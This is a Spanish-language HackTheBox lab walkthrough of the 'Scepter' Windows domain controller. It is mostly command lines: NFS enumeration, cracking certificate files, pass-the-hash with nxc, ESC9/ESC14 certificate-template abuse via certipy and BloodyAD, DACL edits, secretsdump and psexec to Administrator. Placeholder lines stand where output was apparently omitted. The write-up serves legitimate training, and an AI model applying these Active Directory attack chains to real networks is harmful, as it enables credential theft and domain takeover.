Scepter

Scepter


HTB Windows

nmap -A -p- -oA scepter 10.129.19.96 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA scepter 10.129.19.96

echo "10.129.19.96 dc01.scepter.htb scepter.htb" | sudo tee -a /etc/hosts

nmap -sU -O -p- -oA scepter-udp 10.129.19.96

ping -c 1 10.129.19.96

ssh_command.

nmap -p- --open -T5 -v -n scepter 10.129.19.96

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn scepter 10.129.19.96 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command. nmap -sCV -p53,88,135,139,389,445,464,593,636,2049,3269,...,49750 10.129.19.96 -oN targeted

ssh_command.

bc targeted -l rb

ssh_command.

Vemos que en el uno de los puertos tiene NFS.

showmount --all dc01.scepter.htb

ssh_command.

ssh_command.

Tenemos tres archivos .pfx, que podrĂ­an ser certificados personales con credenciales.

sudo bash -c 'cp nfs/* .'

Copiamos los archivos a un directorio local.

ssh_command.

sudo umount ./nfs

ssh_command.

Trate de hacerlo con los archivos pfx pero me salio todo igual

sudo openssl x509 -in clark.pfx -text -noout

ssh_command.

pfx2john lewis.pfx | tee -a hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

ssh_command.

openssl pkcs12 -in lewis.pfx -out lewis.pem -nodes

cat lewis.pem

ssh_command.

Ninguno de los archivos funcionaron.

Para crear un .pfx se necesita un key y un .crt. En el que parece que baker es el candidato.

sudo openssl x509 -in baker.crt -text -noout

ssh_command.

Nos damos cuenta que el usuario es d.baker@scepter.htb

openssl rsa -in baker.key -check

ssh_command.

sudo timedatectl set-ntp off

sudo rdate -n 10.129.19.96

sudo ntpdate -u 10.129.19.96

certipy-ad auth -pfx baker.pfx -dc-ip 10.129.19.96

ssh_command.

nxc smb 10.129.19.96 -u d.baker -H 18b5fb0d99e7a475316213c15b6f22ce

ssh_command.

nxc smb 10.129.19.96 -u d.baker -H 18b5fb0d99e7a475316213c15b6f22ce --shares

ssh_command.

nxc smb 10.129.19.96 -u d.baker -H 18b5fb0d99e7a475316213c15b6f22ce --users | awk '{print $5}' > users.txt

ssh_command.

docker-compose -f bloodhound.yml up

ssh_command.

bloodyAD --host dc01.scepter.htb -d "scepter.htb" -u d.baker -p ':18b5fb0d99e7a475316213c15b6f22ce' set password "a.carter" 'P@ssw0rd123'

ssh_command.

impacket-getTGT -dc-ip 10.129.19.96 -hashes ':18b5fb0d99e7a475316213c15b6f22ce' 'scepter.htb/d.baker'@dc01.scepter.htb

ssh_command.

certipy-ad find -u d.baker@scepter.htb -hashes :18b5fb0d99e7a475316213c15b6f22ce -vulnerable -stdout -text

Vemos que tiene una vulnerabilidad de ESC9

ssh_command.

impacket-dacledit -action 'write' -rights 'FullControl' -inheritance -principal 'a.carter' -target-dn 'OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB' 'scepter.htb/a.carter:P@ssw0rd123'

ssh_command.

bloodyAD --host dc01.scepter.htb -d scepter.htb -u a.carter -p 'P@ssw0rd123' set object d.baker mail -v h.brown@scepter.htb

ssh_command.

ldapmodify -x -D 'a.carter@scepter.htb' -w 'P@ssword123' -H 'ldap://dc01.scepter.htb'<<EOF
dn: CN=D.BAKER,OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB
changetype: modify
add: mail
mail: h.brown@scepter.htb
EOF

ssh_command.

certipy-ad req -username 'd.baker@scepter.htb' \
                 -hashes :18b5fb0d99e7a475316213c15b6f22ce \
                 -target dc01.scepter.htb \
                 -ca scepter-DC01-CA \
                 -template StaffAccessCertificate

ssh_command.

ldapmodify -x -D 'a.carter@scepter.htb' -w 'P@ssword123' -H 'ldap://dc01.scepter.htb'<<EOF
dn: CN=D.BAKER,OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB
changetype: modify
delete: mail
EOF

ssh_command.

certipy-ad auth -username 'p.adams' -pfx d.baker.pfx -domain 'scepter.htb' -dc-ip 10.129.19.96

ssh_command.

vim /etc/krb5.conf

ssh_command.

KRB5CCNAME=h.brown.ccache

evil-winrm -i dc01.scepter.htb -r scepter.htb

ssh_command.

ssh_command.

bloodyAD --host dc01.scepter.htb \
-d "scepter.htb" \
-u d.baker \
-p ':18b5fb0d99e7a475316213c15b6f22ce' \
get object "CMS" --attr description
bloodyAD --host dc01.scepter.htb \
-d "scepter.htb" \
-u d.baker \
-p ':18b5fb0d99e7a475316213c15b6f22ce' \
get object "HELPDESK ADMINS" --attr description

ssh_command.

bloodyAD -d scepter.htb -k --host dc01.scepter.htb set object p.adams altSecurityIdentities -v 'X509:<RFC822>p.adams@scepter.htb'

bloodyAD --host dc01.scepter.htb -d scepter.htb -u a.carter -p 'P@ssw0rd123' set object d.baker mail -v p.adams@scepter.htb

ssh_command.

certipy-ad req -username 'd.baker@scepter.htb' \
 -hashes :18b5fb0d99e7a475316213c15b6f22ce \
 -target dc01.scepter.htb \
 -ca scepter-DC01-CA \
 -template StaffAccessCertificate

impacket-secretsdump -hashes :1b925c524f447bb821a8789c4b118ce0 scepter.htb/p.adams@dc01.scepter.htb

ssh_command.

impacket-psexec -hashes ':a291ead3493f9773dc615e66c2ea21c4' 'scepter.htb/Administrator'@dc01.scepter.htb powershell.exe

ssh_command.

© 2025 Cu3rv0x